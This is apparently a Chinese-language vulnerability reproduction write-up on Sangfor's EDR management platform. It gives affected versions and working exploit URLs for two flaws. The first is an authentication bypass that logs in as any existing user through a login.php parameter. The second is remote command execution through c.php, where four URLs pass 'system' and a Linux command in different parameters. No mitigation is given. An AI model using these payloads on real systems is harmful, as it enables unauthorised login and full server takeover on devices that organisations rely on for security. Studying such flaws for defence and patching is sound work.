深信服EDR任意用户登录与命令执行漏洞
- 1.深信服EDR简介
- 2.深信服EDR漏洞
- 2.1.后台任意用户登录漏洞
- 2.1.1.漏洞描述
- 2.1.2.影响版本
- 2.1.3.漏洞复现
- 2.2.任意命令执行漏洞
- 2.2.1.漏洞描述
- 2.2.2.影响版本
- 2.2.3.漏洞复现
- 2.2.3.1.构建URL
- 2.2.3.2.效果
1.深信服EDR简介
终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。
端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。
2.深信服EDR漏洞
2.1.后台任意用户登录漏洞
2.1.1.漏洞描述
攻击者利用该漏洞,登录任意用户。
2.1.2.影响版本
EDR <= v3.2.19
2.1.3.漏洞复现
构建URL:https://IP地址/ui/login.php?user=admin
注意后面的admin是必须存在的用户,也就是说EDR设备上必须存在admin的用户,这样才能直接登录admin,若访问的是一个不存在的用户,那么必然无法登录。
2.2.任意命令执行漏洞
2.2.1.漏洞描述
攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。
2.2.2.影响版本
EDR v3.2.16
EDR v3.2.17
EDR v3.2.19
2.2.3.漏洞复现
注意这里的话,其实有很多的命令是不能用的,而文件上传后,也会存在无法连接的情况,这个还是需要注意一点。
2.2.3.1.构建URL
这里的url都是构建出来的,后面的id就是命令,根据不同的命令进行执行,注意使用的是Linux命令。
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&path=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&row=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&limit=id
2.2.3.2.效果
查询当前路径
查看当前目录下文件
